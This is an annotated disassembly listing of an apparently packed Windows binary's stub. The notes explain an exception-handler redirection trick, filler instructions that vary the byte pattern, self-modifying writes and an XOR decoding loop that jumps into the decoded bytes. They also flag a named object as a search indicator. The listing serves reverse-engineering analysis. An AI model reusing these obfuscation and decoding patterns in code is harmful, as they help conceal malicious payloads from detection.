                dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch
                dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 92ED811Ah
                dd 0E8001039h, 0FFFFE0B3h, 4C261h, 2070103h, 12D00506h
                dd 7BB9C4FBh, 119415FFh, 0FF8B0100h
; ---------------------------------------------------------------------------
; note: start-up stub (no xref recorded by IDA). It builds a frame and calls
; sub_314439D7, which links an exception registration whose handler is this
; call's return address: the "stc / call sub_31443A81" pair below.
; NOTE(review): as listed, "mov ebp, 0" precedes a jump to code that reads
; [ebp-8]; the immediate may be patched at run time - confirm dynamically.
                cld
                push    ebp
                mov     ebp, esp
                call    sub_314439D7
                stc
                call    sub_31443A81
                stc
                stc
                mov     ebp, 0
                jmp     loc_31443A1D

; =============== S U B R O U T I N E =======================================

; note: sub_314439D7 - decoder. stc/clc/cmc, "xchg ebx, ebx",
; "mov ebx, ebx", "mov ecx, ecx", nop and "jmp short $+2" do not change the
; result; they are filler that varies the byte pattern of the stub.

sub_314439D7    proc near               ; CODE XREF: UPX2:314439C0p
                push    dword ptr fs:0
; writes into bytes IDA lists as code at loc_31428210 (self-modification; effect not visible here)
                xor     dword ptr ds:loc_31428210+2, ebp
                nop
                xchg    ebx, ebx
                mov     fs:0, esp
; NOTE(review): IDA labels this import slot GetProcAddress, but 8 and then 9
; dwords are pushed, which does not fit that API. Either the label is wrong
; for the unpacked image or the calls are expected to fail or fault into the
; handler installed above - confirm in a debugger or emulator.
                xor     ecx, ecx
                push    ecx
                push    ecx
                push    ecx
                push    ecx
                push    ecx
                push    ecx
                push    8
                push    ecx
                call    ds:dword_31428090 ; GetProcAddress
                xor     ecx, ecx
                push    40h
                push    ecx
                push    ecx
                push    ecx
                push    10000h
                push    ecx
                push    80000000h
                push    ecx
                push    ecx
                call    ds:dword_31428090 ; GetProcAddress

; note: with the caller's frame, [ebp-8] is the value saved by
; "push dword ptr fs:0" above, so the previous registration is restored.
; sub_31443A79 then returns its own return address in ebx; subtracting
; 0FFFEF273h adds 10D8Dh (mod 2^32) to form the start of the region to
; decode. ecx = 2A91h bytes, key byte in di starts at 0CDh.
loc_31443A1D:                           ; CODE XREF: UPX2:314439D2j
                stc
                mov     edi, [ebp-8]
                mov     fs:0, edi
                stc
                jmp     short $+2
                call    sub_31443A79
                clc
                sub     ebx, 0FFFEF273h
                xor     ecx, ecx
                or      ecx, 2A91h
                cld
                cmc
                and     edi, 0
                add     edi, 0CDh
                xchg    ebx, ebx
                push    ebx             ; kept for the final jmp ebx
                jmp     short $+2

; each byte at [ebx] is XORed with the low byte of di; di advances by 0FBh per byte
loc_31443A4E:                           ; CODE XREF: sub_314439D7+93j
                mov     al, [ebx]
                mov     ebx, ebx
                xor     ax, di
                mov     [ebx], al
                cmc
                mov     ebx, ebx
                add     ebx, 1
                add     di, 0FBh
                dec     ecx
                stc
                xchg    ebx, ebx
                jmp     short $+2
                or      ecx, ecx
                jnz     short loc_31443A4E
                pop     ebx
                clc
                nop
                clc
                mov     ecx, ecx
                leave
                nop
                jmp     ebx             ; continue at the start of the decoded region
sub_314439D7    endp

; ---------------------------------------------------------------------------
                db 90h
                db 87h, 0DBh

; =============== S U B R O U T I N E =======================================

; note: sub_31443A79 - returns with ebx = address of the instruction after
; the call (pop ebx / push ebx / retn); used to locate the code in memory.

sub_31443A79    proc near               ; CODE XREF: sub_314439D7+53p
                pop     ebx
                xchg    ebx, ebx
                push    ebx
                retn
sub_31443A79    endp

; ---------------------------------------------------------------------------
                align 10h
                stc

; =============== S U B R O U T I N E =======================================

; note: sub_31443A81 - same handler tail as sub_3144339D, using ecx: it
; stores its own return address at offset 0B8h of the structure at [esp+10h]
; (presumably CONTEXT.Eip) and returns 0 to the exception dispatcher.

sub_31443A81    proc near               ; CODE XREF: UPX2:314439C6p

arg_C           = dword ptr 10h

                mov     ecx, [esp+arg_C]
                xor     eax, eax
                pop     dword ptr [ecx+0B8h]
                retn
sub_31443A81    endp ; sp-analysis failed

; ---------------------------------------------------------------------------
                dw 89F5h
                dd 0D2h, 0F590C3h, 53800000h, 535353h, 0E0h dup(0)
; note: object-manager name in the BaseNamedObjects directory. The "Sect"
; suffix and the UNICODE_STRING copy further down suggest a named section
; opened through the native API - TODO confirm. The name is a stable string
; to search for in memory images and handle listings.
aBasenamedobjec:
                unicode 0, <\BaseNamedObjects\VtSect>,0
; note: table of resolved API addresses. The entries are 32-bit pointers
; that start at the dw below, so IDA's dd grouping is shifted by two bytes:
; dw 9B47h plus the low word 7C80h of the next item gives 7C809B47h
; (KERNEL32.CloseHandle in the import list at the top of the file), the
; following entry is 7C8308ADh (KERNEL32.CreateEventA), and so on. These are
; absolute addresses captured on the analysis machine.
                dw 9B47h
                dd 8AD7C80h, 3317C83h, 0ADA07C91h, 7C80h, 0
                dd 0BDB60000h, 1A247C80h, 945C7C80h, 23677C80h, 42C7C80h
                dd 6377C81h, 4B0F7C81h, 0C0587C86h, 0E7EC7C80h, 0ABDE7C80h
                dd 153C7C80h, 0A777C81h, 1C457C81h, 0B6A17C83h, 8FF7C80h
                dd 5DCA7C86h, 11DA7C83h, 2ADE7C81h, 1BA57C81h, 1D777C82h
                dd 0B9057C80h, 0BB767C80h, 9E17C80h, 3DE57C83h, 3F587C86h
                dd 27827C86h, 1CB87C81h, 24427C83h, 0B1C7C80h, 0B9747C81h
                dd 9A517C80h, 0D877C80h, 0D4607C81h, 0D6827C90h, 0D7547C90h
                dd 0D7697C90h, 0D7937C90h, 7C90h, 0DC550000h, 0DCFD7C90h
                dd 0DD907C90h, 0DDBA7C90h, 0DEB67C90h, 0E0457C90h, 0EA327C90h
                dd 30C67C90h, 7C91h, 14h dup(0)
; note: 320030h / 31443F7Ch read as a UNICODE_STRING header (Length 30h,
; MaximumLength 32h, Buffer 31443F7Ch) followed by its buffer: the same
; \BaseNamedObjects\VtSect text in UTF-16 (24 characters = 30h bytes).
                dd 320030h, 31443F7Ch, 42005Ch, 730061h, 4E0065h, 6D0061h
                dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 740056h
                dd 650053h, 740063h, 0D3h dup(0)
                dd offset loc_31441000
                dd 1341h dup(0)
UPX2            ends

; Section 4. (virtual address 00029000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00029000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================

; Segment type: Pure data
; Segment permissions: Read/Write
_idata2         segment para public 'DATA' use32
                assume cs:_idata2
                ;org 31449000h
                align 2000h
_idata2         ends


                end start